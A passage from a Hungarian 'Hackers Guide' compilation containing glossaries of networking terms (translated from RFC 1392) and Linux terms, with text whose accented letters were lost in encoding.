vagy majordomo). Lsd mg: Electronic Mail. MILNET MILitary NETwork. Eredetileg az ARPANET rsze volt, de 1984-ben klnvlasztottk, hogy a katonai ltestmnyek megbzhat hlzati szolgltatsokkal rendelkezzenek. Az ARPANET-et ekzben kutatsi clokra hasznltk tovbb. MIME (Multipurpose Internet Mail Extensions) = (Tbbcl Internet Levlkiegsztsek) Kiegszts az Internet elektronikus levelezshez, mely megengedi a nem szveges adattvitelt, gy mint grafika, hang s fax. Lersa az 1341-es RFCben tallhat meg. Lsd mg: Electronic Mail MTU (Maximum Transmission Unit) = (Maximlis adatviteli egysg) A legnagyobb keretmret, melyet a fizikai kzegben el lehet kldeni. multi-homed host = tbbotthonos hoszt Olyan hoszt, melynek egynl tbb hlzathoz van csatlakozsa. Ez a hoszt brmely kapcsolat fell fogdhat adatot, vagy kldhet oda, de ms csompontok szmra nem vgez tvlasztst. Lsd mg: host, router. [Forrs: MALAMUD] MX Record (Mail Exchange Record) = (Levlvlt bejegyzse) Egy olyan DNS bejegyzsi tpus, mely jelzi, hogy egy adott domain-en mely hoszt foglalkozik a levelek kezelsvel. Lsd mg: Domain Name System, Electronic Mail. [Forrs: MALAMUD]
50
Hackers Guide
N name resolution = nvfelderts Az a folyamat, mely sorn egy nvhez hozzrendelik a hozztartoz cmet. netiquette Az elnevezs az "etiquette" szbl szrmazik s a illedelmes hlzati viselkedssel kapcsolatos. network = hlzat A szmtgpes hlzat egy adatkommunikcis rendszer, mely klnbz helyen tallhat szmtgpes rendszereket kt ssze. Egy hlzat brmilyen sszettelben llhat LAN-okbl, MAN-okbl s WAN-okbl. Lsd mg: Local Area Network, Wide Area Network, internet. NFS(R) A Sun Microsystems ltal kifejlesztett s az 1049-es RFC-ben lert protokoll, mely lehetv teszi egy szmtgpes rendszer szmra, hogy a hlzaton keresztl gy rjen el file-okat, mintha azok egy helyi lemezen lennnek. Ezt a protokollt tbb mint ktszz cg hasznlta fel termkeiben, s mostanra tulajdonkppen egy internetes szabvnny vlt. [Forrs: NNSC] NIC (Network Information Center) = Hlzati Informcis Kzpont A NIC informcit szolgltat s segtsget nyjt a hlzat felhasznlinak. NIS (Network Information Services) = Hlzati Informcis Szolglatok Szolglatok egy csoportja, melyet gyakran a NIC knl fel a hlzat felhasznlinak. Lsd mg: Network Information Center. NNTP (Network News Transfer Protocol) = Hlzati Hrtovbbtsi Protokoll A 977-es RFC-ben lert protokoll, mely a hrek terjesztsre, krsre s beszerzsre hasznlatos. Lsd mg: Usenet. node = csompont Egy cmezhet eszkz, mely egy szmtgpes hlzathoz csatlakozik. Lsd mg: host, router. NSF (National Science Foundation) A U.S. government agency whose purpose is to promote the advancement of science. NSF funds science researchers, scientific projects, and infrastructure to improve the quality of scientific research. The NSFNET, funded by NSF, is an essential part of academic and research communications. It is a highspeed "network of networks" which is hierarchical in nature. At the highest level, it is a backbone network currently comprising 16 nodes connected to a 45Mb/s facility which spans the continental United States. Attached to that are midlevel networks and attached to the mid-levels are campus and local networks. NSFNET also has connections out of the U.S. to Canada, Mexico, Europe, and the Pacific Rim. The NSFNET is part of the Internet. O P packet = csomag A hlzaton tovbbtott adat egysge. A "csomag" az egysgnyi adat kifejezsre hasznlt ltalnos kifejezs az tviteli protokoll minden szintjn. Lsd mg: datagram, frame.
51
Hackers Guide
packet switching = csomagkapcsols Egy kommunikcis forma, amikor is a csomagok (zenetek) nllan kerlnek routolsra (vagyis nllan vlasztjk ki az tvonalukat) a klnbz hosztok kztt, elre fellltott kommunikcis tvonal nlkl. Lsd mg: connectionless. ping (Packet internet groper.) Egy program, melyet a clgpek elrhetsgnek vizsglatra hasznlatos, mg pedig gy, hogy ICMP visszhang krseket kld s vr a vlaszra. A kifejezst gy is hasznljk: "Pingesse meg az X hosztot, hogy elrhet-e!" [Forrs: RFC1208] port A szlltsi rtegben a csomagokat portok szerint vlogatjk szt. Minden alkalmazs klnll porton "hallgatzik" (pl. a webszerver a 80-as porton). Lsd mg: Transmission Control Protocol, User Datagram Protocol. POP (Post Office Protocol) = (POstahivatali Protokoll) Ezt a protokoll arra terveztk, hogy segtsgvel az egyfelhasznls gpek egy kiszolglrl olvassk leveleiket. Hrom verzija ismert: POP, POP2 s a POP3, de ezek NEM kompatibilisek egymssal. Lsd mg: Electronic Mail. postmaster = postamester Az a szemly, aki az elektronikus levelezs problmival foglalkozik, a felhasznlkkal kapcsolatos krdsekre vlaszol s ms hasonl feladatokat lt el - egy adott terleten bell. Lsd mg: Electronic Mail. [Forrs: ZEN] PPP Pontl-Pontig-Protokoll. A PPP, a SLIP utdja, a routertl-routerig s hoszttlhlzatig kapcsolat megteremtsre alkalmas szinkron s asszinkron vonalakon egyarnt. Lsd mg: SLIP. Prospero A distributed filesystem which provides the user with the ability to create multiple views of a single collection of files distributed across the Internet. Prospero provides a file naming system, and file access is provided by existing access methods (e.g., anonymous FTP and NFS). The Prospero protocol is also used for communication between clients and servers in the archie system. See also: anonymous FTP, archie, archive site, Gopher, Network File System, Wide Area Information Servers. protocol = protokoll zenetformtumok hivatalos lersa, valamint azon szablyok sszessge, melyet kt szmtgpnek kell kvetnie, hogy zeneteiket kicserlhessk. A protokollok alacsony szinten meghatrozhatjk a gpek kztti interfszeket (vagyis pl. hogy milyen bitek s byte-ok menjenek a kbelen), ill. magas szinten a programok kztti adatcsert (vagyis pl. kt program hogyan kldje a file-okat egymsnak az Interneten). [Forrs: MALAMUD] proxy ARP The technique in which one machine, usually a router, answers ARP requests intended for another machine. By "faking" its identity, the router accepts responsibility for routing packets to the "real" destination. Proxy ARP allows a site to use a single IP address with two physical networks. Subnetting would normally be a better solution. See also: Address Resolution Protocol [Forrs: RFC1208] Q
52
Hackers Guide
queue = sor Csomagok csoportja, melyek feldolgozsra vrnak. R RARP (Reverse Address Resolution Protocol) A protocol, defined in RFC 903, which provides the reverse function of ARP. RARP maps a hardware (MAC) address to an internet address. It is used primarily by diskless nodes when they first initialize to find their internet address. See also: Address Resolution Protocol, BOOTP, internet address. repeater = ismtl Egy eszkz, amely elektromos jeleket terjeszt az egyik kbelrl a msikra. Lsd mg: gateway, router. RFC (Request For Comments) = (Megjegyzsek krse) Dokumentumok 1969-ben indtott sorozata, mely lerja az Internet protokolljait s az azzal kapcsolatos ksrleteket. Nem mindegyik (valjban nagyon kevs) RFC r le Internet szabvnyt, de minden Internet szabvnyt RFC-knt tesznek kzz. Az RFC dokumentumsorozat azrt szokatlan, mert a szabvny-javaslatokat az Internet kutat s fejleszt kzssg terjeszti el, sajt nevben, nem gy mint pl. a CCITT s az ANSI szervezetek ltal hivatalosan fellbrlt s szabvnyostott protokollokat. Lsd mg: For Your Information. RFC 822 Az elektronikus levl zenetek fejrszt ler Internet szabvny. A levelezs szakrti gyakran hivatkoznak r, mint "822-es zenetek". Az elnevezs a 822-es RFC-bl szrmazik (STD 11, RFC 822), mely a 822-es formtum meghatrozst tartalmazza, mely korbban 733-as formtum nven volt ismert. Lsd mg: Electronic Mail. [Forrs: COMER] RIPE (Reseaux IP Europeenne) A TCP/IP protokollt hasznl eurpai hlzatok egyttmkdsi szervezete. A RIPE foglalkozik tbbek kztt az IP cmek elosztsval is, valamint ajnlsokat kszt. rlogin A Berkeley UNIX ltal meghonostott szolgltats, mely sorn a felhasznl bejelentkezhet egy msik UNIX rendszerbe (ahova ilyen jogosultsga van) s ott gy dolgozhat, mintha terminlja kzvetlen kapcsolatban lenne a tvoli gppel. Hasonl a telnethez, azzal a klnbsggel, hogy a felhasznli azonosts ms mdon trtnik. route = tvonal Az az t, melyet a hlzati forgalom jr be a forrstl a clig. Az tvonal a lehetsges t is lehet egy adott hoszttl msik hosztig, vagy clig. routed tvonal Dmon. Egy program, mely 4.2BSD/4.3BSD UNIX (s azzal kompatibilis) opercis rendszereken fut s feladata az tvonalak kihrdetse egy helyi hlzaton, a RIP protokoll felhasznlsval. (Ejtsd: rt-d) Lsd mg: gated. router = tvlaszt
53
Hackers Guide
Egy eszkz, mely a hlzatok kztti forgalmat tovbbtja. A tovbbtsrl a hlzati rteg informcii, ill. az tvlasztsi tbla alapjn szletik dnts, gyakran tvlasztsi protokollok kzremkdsvel. RPC (Remote Procedure Call.) An easy and popular paradigm for implementing the client-server model of distributed computing. A request is sent to a remote system to execute a designated procedure, using arguments supplied, and the result returned to the caller. There are many variations and subtleties, resulting in a variety of different RPC protocols. S SLIP (Serial Line IP) = (Soros vonaLi IP) Egy protokoll, melyet az IP soros vonalon (mint pl. telefon vonal, RS-232-es kbel) keresztli hasznlatra ksztettek, kt rendszer sszekttetsre. A SLIP meghatrozsa az 1055-s RFC-ben tallhat. Lsd mg: Point-to-Point Protocol. SMTP (Simple Mail Transfer Protocol) = Egyszer Levltviteli Protokoll) A 10-es STD-ben s a 821-es RFC-ben lert protokoll, melyet a szmtgpek kztti elektronikus levelezs tvitelre hasznlnak. Ez egy kiszolglk kztti protokoll, ezrt az zenetek elrshez ms protokollokat hasznlnak. Lsd mg: Electronic Mail, Post Office Protocol, RFC 822. SQL (Structured Query Language.) = (Strukturlt Lekrdeznyelv) Nemzetkzileg szabvnyostott nyelv, mely a relcis adatbzisok meghatrozsra s elrsre kszlt. stub network A stub network only carries packets to and from local hosts. Even if it has paths to more than one other network, it does not carry traffic for other networks. subnet = alhlzat A hlzat egy darabja, amely egy fizikailag klnll hlzati szegmens is lehet s amely a hlzat ms rszvel megosztva hasznlja ugyanazt a hlzati cmet egy alhlzati szmmal megklnbztetve. Az alhlzat a hlzathoz kpest olyan, mint a hlzat egy internethez kpest. Lsd mg: internet, network. subnet address = alhlzati cm Egy IP cm alhlzati rsze. Az alhlzatokra osztott hlzatokban az IP cm hoszt rsze alhlzati s hoszt rszre oszlik egy cm (alhlzati) maszk segtsgvel. Lsd mg: address mask, IP address, host address. T TCP (Transmission Control Protocol) = (tvitelvezrlsi protokoll) Az STD 7-ben, s a 793-as RFC-ben lert Internet szabvny protokoll. Az UDP-vel ellenttben kapcsolat-orientlt s stream-orientlt. Lsd mg: User Datagram Protocol. TCP/IP Protocol Suite tvitelvezrlsi protokoll az Internet protokoll felett. Egy megszokott rvidts, amely az IP felett fut szlltsi s alkalmazsi protokollokra vonatkozik. Lsd mg: IP, ICMP, TCP, UDP, FTP, Telnet, SMTP.
54
Hackers Guide
Telnet A telnet a tvoli terminlkapcsolati szolglatok Internet szabvny protokollja. Lersa megtallhat az STD 8-ban s a 854-es RFC-ben, de tovbbi kiterjesztsek tallhatk ms RFC-kben is. terminal emulator Egy program, mely egy szmtgp szmra lehetv teszi, hogy valamilyen terminlt emulljon. A munkalloms pp ezrt egy tvoli hoszt terminljnak tnik. [Forrs: MALAMUD] terminal server = terminl kiszolgl Egy eszkz, mely sok terminlt kapcsol egy LAN-hoz egyetlen hlzati csatlakozson keresztl. A terminl kiszolgl sok hlzati felhasznlt is kapcsolhat aszinkron portjaihoz telefonos kapcsolatok ltestsre, ill. nyomtatk elrsre. Lsd mg: Local Area Network. TN3270 A telnet program egy vltozata, melyet az IBM mainframe-ekhez trtn csatlakozst teszi lehetv, valamint azt, hogy gy hasznljunk egy mainframe-et, mintha 3270-es, vagy ehhez hasonl terminlunk lenne. [Forrs: BIG-LAN] topology = topolgia A hlzati topolgia megmutatja, hogy a szmtgpek hogyan helyezkednek el s milyen sszekttetsek vannak kzttk. A hlzati rtegnek lpst kell tartania a mindenkori hlzati topolgival, hogy kpes legyen csomagokat a vgs clpontba eljuttatni. [Forrs: MALAMUD] Trojan Horse = Trjai fal Egy szmtgpes program, melynek ltrehozja olyan lehetsgeket rejtett el benne, melyek segtsgvel brmely rendszert el tud rni, ahol e program fut. Lsd mg: virus, worm. See RFC 1135. U UDP (User Datagram Protocol) = (felhasznli datagramprotokoll) Internet szabvnyos szlltsi rteg protokoll, melynek lersa az STD 6-ban s a 768-as RFC-ben tallhat meg. Kapcsolatmentes protokoll, mely tulajdonkppen az Internet Protokoll felhasznli interfsze. Lsd mg: connectionless, Transmission Control Protocol. Usenet Tbb ezer tma szerint megnevezett hrcsoport, a protokollokat futtat szmtgpek s a Usenet hreket olvas s kld emberek sszessge. Nem minden hoszt vesz rszt a Usenetben s nem minden Usenet hoszt tallhat az Interneten. Lsd mg: Network News Transfer Protocol, UNIX-to-UNIX CoPy. [Forrs: NWNET] UUCP (UNIX-to-UNIX CoPy) This was initially a program run under the UNIX operating system that allowed one UNIX system to send files to another UNIX system via dial-up phone lines. Today, the term is more commonly used to describe the large international network which uses the UUCP protocol to pass news and electronic mail. See also: Electronic Mail, Usenet. V
55
Hackers Guide
virus Egy program, ami sajt magt terjeszti azzal, hogy szmtgpes rendszerek kztt megosztott programokba gyazdik. Lsd mg: Trojan Horse, worm. W WAM (Wide Area Network) Egy olyan hlzat, mely tbbnyire soros vonalakbl ll s nagyobb fldrajzi terletet fed le. Lsd mg: Local Area Network. World Wide Web (WWW or W3) = Vilgmret hl Egy hypertext alap, terjesztett informcis rendszer, melyet a CERN kutati hoztak ltre svjcban. A felhasznlk ltrehozhatjk, szerkeszthetik, vagy bngszhetik a hypertext dokumentumokat. worm = freg Egy szmtgpes program, mely sajtmagt msolja s terjeszti. A frgeket, a vrusokkal ellenttben hlzati krnyezetre terveztk. A hlzati freg kifejezst Shoch & Hupp hasznlta elszr 1982 mrciusban. A leghresebb internetes freg 1988 novemberben szabadult el: sikeresen terjesztette el magt kb. 6 ezer internetes hlzaton. Lsd mg: Trojan Horse, virus. WYSIWYG What You See is What You Get = Amit ltsz, azt kapod (pldul szvegszerkesztknl, ahol az fog a papron is szerepelni nyomtats utn, mint amit a kpernyn ltunk). X X (The X Window System) X-nek nevezik ezt a TCP/IP alap, hlzatra kifejlesztett grafikus felletet. A hlzati ablakoz-rendszer lehetsget nyjt egy program szmra, hogy egy msik szmtgp kpernyjt hasznlja. Szles krben elterjedt megvalstsa az X11 (mint a MIT Athena projektjnek egy rsze). Y Z
References BIG-LAN "BIG-LAN Frequently Asked Questions Memo", BIG-LAN DIGEST V4:I8, February 14, 1992. COMER Comer, D., "Internetworking with TCP/IP: Principles, Protocols and Architecture", Prentice Hall, Englewood Cliffs, NJ, 1991. FYI4 Malkin, G., and A. Marine, "FYI on Questions and Answers: Answers to Commonly asked "New Internet User" Questions", FYI 4, RFC 1325, Xylogics, SRI, May 1992. HACKER
56
Hackers Guide
"THIS IS THE JARGON FILE", Version 2.9.8, January 1992. HPCC "Grand Challenges 1993: High Performance Computing and Communications", Committee on Physical, Mathmatical and Engineering Sciences of the Federal Coordinating Council for Science, Engineering and Technology. MALAMUD Malamud, C., "Analyzing Sun Networks", Van Nostrand Reinhold, New York, NY, 1992. NNSC "NNSC's Hypercard Tour of the Internet". LAQUEY LaQuey, T. (with J. Ryer), "The Internet Companion: A Beginner's Guide to Global Networking", Addison-Wesley, Reading, MA, 1992. NWNET Kochmer, J., and NorthWestNet, "The Internet Passport: NorthWestNets Guide to Our World Online", NorthWestNet, Bellevue, WA, 1992. RFC1208 Jacobsen, O., and D. Lynch, "A Glossary of Networking Terms", RFC 1208, Interop, Inc., March 1991. STD1 Postel, J., "IAB Official Protocol Standards", STD 1, RFC 1360, Internet Architecture Board, September 1992. STD2 Reynolds, J., and J. Postel, "Assigned Numbers", STD 2, RFC 1340, USC/Information Sciences Institute, July 1992. TAN Tanenbaum, A., "Computer Networks; 2nd ed.", Prentice Hall, Englewood Cliffs, NJ, 1989. ZEN Kehoe, B., "Zen and the Art of the Internet", February 1992. Az eredeti RFC #1392 alkoti: Gary Scott Malkin Xylogics, Inc. 53 Third Avenue Burlington, MA 01803 Phone: (617) 272-8140 EMail: gmalkin@Xylogics.COM Tracy LaQuey Parker University of Texas at Austin Computation Center Austin, TX 78712 Phone: (512) 471-2444 EMail: tracy@utexas.edu
57
Hackers Guide
************************************************************************************************
Eredeti Linux Kissztr Vrsbaranyi Zoltn (vbzoli@tarki.hu) "Terminolgia" cm mve alapjn a kz javra... [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] [Y] [Z] {A} account = felhasznli hozzfrs, terlet Az internetes kiszolgal gpeken miden felhasznal rendelkezik internet account-al, mely magban foglal egy sajt, n. HOME knyvtrat, egy elektonikus levelezsi cmet (e-mail), ill. klnbz szolgltatsokhoz biztost klnfle elrsi jogokat. A hagyomnyos felhasznli hozzfrs a legtbb program elindtst lehetv teszi, s a legtbb helyre "bejrst enged". A vendg hozzfrs (guest account) csak meglehetsen lekorltozott elrst engedlyez, mg a "root" hozzfrs "isteni" jogokat ad, mivel a root a renszer gazdja. {B} {C} {D} device = eszkz A klnbz hardveres kiegsztket nevezik eszkzknek. Ilyen eszkz, pl. a modem, vagy a hangkrtya. Az eszkzk szoftveres lekezelsre lteznek a device driver-ek. directory = knyvtr (vagy file-tr?) File-ok, vagy tovbbi knyvtrak csoportjt hvjk knyvtrnak. A knyvtrak ltalban file-okat foglalnak magukba, gy segtve azok knnyebb csoportostst. Egy knyvtrban a file-ok mellett tovbbi knyvtrak is lehetnek, melyekben ugyancsak tovbbi file-ok, vagy knyvtrak szerepelhetnek. Ez gy nz ki, mint ahogy a fa gai indulnak ki a trzsbl s egymsbl. Ezrt is nevezik a fknyvtrat gykr-nek (root), a knyvtrszerkezetet pedig fag-struktrnak. Vgl egy gyakorlati plda: Szeretnnk ha a jtkprogramok s hozzjuk tartoz dolgok olyan helyen lennnek, ahol elklnlve tallhatnnk rjuk. Botorsg lenne minden programot s annak minden file-jt a "gykrbe" rakni,
58
Hackers Guide
mert akkor nehezen klnbztethetnnk meg mi mihez tartozik. Ksztnk teht egy /games/ knyvrat. gy mr kzelebb jutottunk a clhoz, mert elklntettk a jtkokat a tbbi programtl. Hogyan vlaszuk el teht a jtkok file-jait egymstl? Minden jtknak ksztnk sajt knyvtrat, pl.: /games/doom/ vagy /games/GrawityWars. gy ezek utn ha keressk a DOOM dolgait, azt mindig /games/doom/-ban talljuk meg. A /games/ knyvtr tartozhat ms knyvtr al is, mint pl. a /usr/, s akkor a DOOM a /usr/games/doom knyvtrban lesz. disk image = lemezlenyomat A floppy lemez teljes tartalma, a knyvtr-struktrval, a floppy filerendszernek sszes adatval egytt trolsra kerl egyetlen file-ba. Ez a lemezlenyomat. Mire j egy ilyen file? A Linux-os terjesztsekhez adnak pl. ilyen lenyomatokat. Egy "res", opercis rendszer nlkli gpre csak floppyrl lehet "bebootolni", vagy esetleg valamilyen EPROM-ba rt program segtsgvel hlzatrl. Ha van a gpnkn MS-DOS, vagy van a kzelnkben valamilyen msik mkd gp, akkor az alatt elkszthet a kvnt bootlemez, gy hogy a terjesztsben tallhat lemezlenyomatot felrjuk egy res floppy-ra. distribution = terjeszts A Linux (s ms hasonl ingyenes) opercis rendszert .n. "terjesztsekkel" a legegyszerbb gpnkre vinni. Ebben ugyanis mr elre sszelltottk a rendszer mkdshez szksges sszes file-t. A terjesztsek rendelkeznek telept programokkal, amelyek ltrehozzk az sszes szksges knyvtrat, s elhelyezik bennk az odaval file-okat (programokat). drive = meghajt A klnbz lemez, vagy szalag tpusok kezelsre alkalmas eszkzket nevezik meghajtnak. Ilyen pldul a floppy meghajt (floppy drive), a HDD vagy kemnylemezes meghajt, vagy a CD-ROM. Nem tvesztend ssze az eszkz meghajtval (device driver), mely inkbb szoftver, mint hardver. {E} ext2 = ext2 (Second Extended Filesystem) A Linux-os opercis rendszerek sajt file-rendszere, melyet eredetileg Linus Torvalds fejlesztett ki a minix file-rendszert kvetve. Az ext2 egy gyors s megbzhat rendszernek bizonyult a tbbi UNIX-os rendszerekhez kpest is. Tmogatja a hossz file-neveket, a biztonsgi jelzket, a jelkpes ktseket, klnbsget tesz a kis s nagy betk kztt. Htrnya, hogy a 2GB-nl nagyob file-okat egyelre nem tmogatja... ;-) {F} file = fjl, llomny ??? (a magyar fordtsa meglehetsen vitatott) A file-ok adatok gyjtemnyei. Egy file lehet szveges, s ekkor "ember szmra" is olvashat formban tallhatak benne adatok, szvegek, de a file tartalmazhat egy programot is, s akkor az futtathat file, de ltezik tmrtett file is, amikor az adatok srtve lettek eltrolva benne, s mg ki tudja hny fle file-fajta ltezik. filesytem = filerendszer vagy fjlrendszer A file-ok (belertve a knyvtrakat) valamilyen rend szerint kerlnek trolsra. Hatalmas trolfelletek lteznek mr, melyeken nehezen lehetne megtallni a kvnt file-t, ha nem tudnnk, hogy merre keressk, hogy hol kezdodik, hol vgzdik, hova tartozik, milyen fajta file. A file-ok trolst hatrozzk meg a
59
Hackers Guide
filerendszerek, melyek meglehetsen eltrek lehetnek egymstl. Pl. van amelyik hosszabb neveket enged meg, van amelyik csak rvidet, vltoz lehet a file-ok ltal elfoglalt legkisebb egysg mrete, vltoz lehet, hogy a file-ok hogy kerlnek bejegyzsre, hogyan rendeldnek egymshoz, stb. A Linux ltal kedvelt filerendszer tpusa az ext2, de maga a Linux tbb fle filerendszert tud kezelni. FTP = File Transfer Protocol = File tviteli protokoll Olyan protokoll (meghatrozott eljrs), melynek sorn egy tvoli gprl fileokat hozunk el, vagy teszk fel oda (termszetesen anlkl, hogy a file-ok eredetijt letrlnnk). A file-ok vltoztats nlkl jutnak el hozznk ellenttben a HTTP-vel. FTP site = FTP-hely (lelhely) Az a hely, ahol sok-sok file-t gyjtttek ssze azzal a cllal, hogy azokat vagy a felhasznlk egy bizonyos kre, vagy az sszes felhasznl elrhesse, azt sajt gpre ttlthesse. A FTP-helyek clja klnbz lehet: van, ahol csak egyetlen opercis rendszerhez szksges programok, vagy maga az opercis rendszer tallhat (ez utbbi meglehetsen ritka, s inkbb csak a Linux-ra, no meg a FreeBSD-re jellemz), aztn van, ahol mindenfle rendszerre van mindenfle program s van rengeteg egyb file, mint pldul: kpek, hangok, animcik s van olyan FTP-hely is, ahol csak egyetlen szoftvernek tallhatak meg a klnfle dolgai, ezek ltalban fejleszti helyek is. {G} gateway = tjr Gateway, azaz tjr alatt tbb mindent rthetnk. A TCP/IP hlzatokban (v.i.: Interneten) az tjr egy olyan kiszolgl gp, amely kt, vagy tbb helyi hlzat kztt biztost sszekttetst egymssal, ill. az Internet tbbi rszvel. Ha adatot kldnk valamely hlzatba, mely nem a mi hlzatunkon van, akkor az az adat akr 10-20 tjrn is keresztl mehet, mire elri a clllomst. tjr ltezhet nem Internetes hlzatok fel is, ill. kt szolgltats kztt is: pl. usenet hrcsoportok s levelezsi listk kztt. gid (group identifier) = csoportazonost Minden kiszolgl gpen a felhasznlk klnbz csoportokba tartoznak, s minden csoportnak van neve, ill. szma. A rendszer a gid alapjn dnti el, hogy melyik file, melyik csoporthoz tartozik (s ennek megfelelen a felhasznlk mely csoportja rheti el vagy mdosthatja). {H} hacker = bnysz, "buhertor" ??? Olyan szemlyek a hackerek, akik programok forrskdjt, vagy rendszerek felptst vizsgljk, s azokat klnbz cllal megvltoztatjk, ill. kiegsztik. Ezek a hackerek "ptgetik" pl. magt a Linux opercis rendszert, ill. a kiegszt programokat is. hard disk = kemny lemez vagy merevlemez Tbb merev lemezecskbl ll mgneses httrtr a "hard disk drive", vagy merevlemezes meghaj (HDD). Manapsg mr szinte minden szmtgp ezt hasznlja httrtrknt, mert jelenleg ez a legolcsbb rhat-olvashat ilyen eszkz. home directory = honknyvtr
60
Hackers Guide
Az a knyvtr, mely egy felhasznla sajtja. Bejelentjezs utn ez a knyvtr lesz a kiindulpontja, alaprtelmezsben ide dologozik, itt vanak a sajt programjai, sajt konfigurcis file-jai, itt trolja leveleit s ide tlti le a programokat a hlzatrl. A felhasznl honknyvtrjban gy rendezi a fileokat, knyvtrstruktrt ahogy kvnja, viszont ms felhasznl ide nem rhat, innen nem trlhet. homepage = honlap vagy cmlap, ottlap A World Wide Web-en egy olyan oldal, lap, mely valakinek, vagy valakiknek a sajt "kiindul helye". Honlapja lehet egy magnszemlynek, melyen e szemlyrl tudhatunk meg rszleteket (mindent, amit magrl elrul, pl. hobbija, munkja), ill. lehet egy cgnek vagy trsulsnak, vagy valamilyen rajongi tbornak, hasonl rdeklds embereknek. A GENERATIONS pl. a Generations projekt honlapja, mely egyben a szerz is. hostname = gpnv vagy gazdanv Az Interneten a hlzati kiszolgl, vagy kliensgpeknek kln-kln sajt nevk van. A teljes rtk neveknek (FQDN, Fully Qualified Domain Name) megklnbztetjk a "domain" s a host rszt. Pldul az arnica.datanet.hu nevezet gpnek a host rsze az arnica s a domain rsze datanet.hu, ennek megfelelen ennek a gpnek arnica a gpneve. Klnbz domain-eken lehetnek ugyanolyan nev gpek is. HOWTO = kotta vagy hogyan A howto-k olyan lersok, melyekben egyes tmakrk rszletesen ismertetve tallhatak. Pl.: PPP-HOWTO lerja a PPP kapcsolat ltestsnek elveit, feltteleit s mdjt. A "hogyan" fordts Vrsbaranyi Zoltntl szrmazik, aki megalkotta a Magyarul-HOGYAN nevezet dokumentumot, mely a Linux magyar krnyezetben trtn hasznlatrl szl. HTML = HyperText Markup Language = HyperText lernyelv Olyan klnleges nyelv, mely a WWW bngsz szmra lerja, hogy mikpp jelentse meg a lert WWW oldalt. A HTML erre klnbz elemeket tartalmaz, melyek meghatrozzk a megjelentend szveg tulajdonsgait, mint pl. vastagsgt, mrett, szint, elhelyezkedst, ill. meghatrozzk az egyes multi-mdis elemek elhelyezkedst, mint pl. a kpek, hangok, animcik. Termszetesen a HTML tartalmazza a megjelentend szveg nagy rszt is. A HTML legfontosabb tulajdonsga, hogy a szvegben lehetv teszi a kereszt-utalsok hasznlatt, azaz egy alhzssal kiemelt szvegrszlet a szvegen bell mshov, ill. akr a vilghlzaton bell akrmelyik gpen elhelyezked szvegre utalhat!!! Eme nagyszer lehetsg vezetett a WWW kialakulshoz. A HTML jabban mr egy msik lernyelvet, a JAVA-t is magban foglalhatja, ill. folyamatos fejldse sorn jabb s jabb lehetsgeket biztost a HTML-ek alkotinak, ill. a WWW oldalak olvasinak. Ez a hipermdia. HTTP = HyperText Transfer Protocol = HyperText tviteli protokoll Olyan tviteli eljrs, melynek sorn a HTML file-okat a WWW szerver kiadja a kliensnek. A HTML file-ban lehetnek utalsok ms file-okra is, melyeket esetleg a krt HTML file-lal egytt kell kiadni. Ezek lehetnek kpek, hangok, animcik, vagy akr egyszer szvegfile-ok. {I} install = telept(s) vagy installl(s) Hardverek zembehelyezse, szoftverek, opercis rendszerek gprevitele, mkdkpess ttele.
61
Hackers Guide
interface = illeszt vagy csatol Olyan eszkz, melynek segtsgvel hardveresen vagy szoftveresen ms hardverekhez, vagy szoftverekhez lehet kapcsoldni. Ilyen illeszt lehet pl. ms-ms elvek szerint mkd hardver elemek, vagy ms protokollt kvet szoftverek kztt. interrupt = megszakts A hardveres krseket megszaktsokra idztik, gy a klnbz hardveres eszkzk meghatrozott idkzkben jutnak hozz a gphez (a processzorhoz), elkerlve ezzel a hardverkonfliktusokat. {J} JAVA = JAVA ? Olyan programozsi nyelv, mely a HTML forrsokban jut el a WWW bngszhz, s ott fut alkalmazsknt "li tovbb lett". Ezzel nem csak pl. statikus kpeket kldhetnk a klienshez, hanem mondjuk egy olyan brt, mely az cselekedetei alapjn ms s ms formt vesz fel. JAVA nyelven kldhetnk kisebb jtkokat is. A JAVA programozsi lz nem olyan rgen kezddtt, de mr minden jelentsebb WWW-helyen tallhat legalbb a cmoldalon valamilyen JAVA alkalmazs. A legtbb esetben ez egy grafikus men, amely akr "mksan" is viselkedhet, vlasztsunknak megfelelen talakulhat, kis animcik lehetnek benne. job = feladat(sor) A felhasznl, vagy rendszergazda ltal meghatrozott feladat(sor). Az elvgezend feladatokat, utastsokat a feladatvezrls (job control) klnbz eszkzeivel lehet irnytani. Egy programot elindthatunk pl. a httrben (anlkl fut, hogy brmit kijelezne a kpernyre), mikzben msik programot is hasznlhatunk, lellthatunk, jraindthatunk, vagy eltehetjk a httrbe. A cron segtsgvel a feladatokat meghatrozott idpontokban is vgeztethetjk. {K} kernel = rendszermag vagy mag Az opercis rendszernek az a rsze, mely megteremti a hardverelemek s a szoftverek kzti sszekttetst. A Linux rendszermag esetben az egyes hardversszetevk (mint pl. a kemnylemezes meghajt, hangkrtya, cd-rom) csak azon keresztl rhetek el. A szoftverek krseit a rendszermagba gyazott meghajk teljestik. {L} library = eljrsknyvtr vagy eljrsgyjtemny Olyan eljrsok gyjtemnye, melyeket klnbz szoftverek hasznlnak, hvnak meg. Az eljrsknyvtr segtsgvel a mr ltez eljrsokat nem kell a programozknak jra s jra megrniuk, mert ezek - tbbnyire - szabvnyos formban lteznek. link = mutat vagy kts A link kifejezsnek tbb jelentse is lehet. A hypertext dokumentumokban tallhatk "rzkeny rszek" mutatk ms domumentumokra, vagy file-okra. Az ext2 filerendszerben tallhat ktsek segtsgvel file-okat kthetnk ssze. login = bejelentkezs
62
Hackers Guide
Amikor a Linux (UNIX) opercis rendszer gpeket konzolrl, vagy Xterminlrl hasznlni szeretnnk be kell jelentkeznnk (loggolnunk), hogy a rendszer eldnthesse kiltnket s jogainkat file-okhoz, ill. utastsokhoz. Termszetesen az sem kizrt, hogy a rendszeren kvl valamely ms program is kr tlnk bejelentkezst. {M} manual = lers vagy kziknyv A Linux (UNIX) opercis rendszerekben tbbnyire minden parancshoz, konfigurcis file-hoz "jr" egy lers, vagy kziknyv, mely tartalmazza, hogy az adott parancs mire hasznlhat s hogyan. Pldul ha kvncsiak vagyuk arra, hogy az "echo" parancs mire kpes, milyen kapcsolkat fogad el, akkor egy parancssornl be kell rnunk, hogy "man echo" s mris megkapjuk az echo parancs tbb oldalas lerst. modul = modul A meghajtk a Linux rendszermagba gyazdnak be. Amennyiben sajt hardvernknek s ignyeinknek megfelel rendszermagot fordtunk elfordulhat, hogy a mr fut renndszer nem tmogat nhny dolgot, melyre pp szksgnk lenne. Ilyenkor jnnek 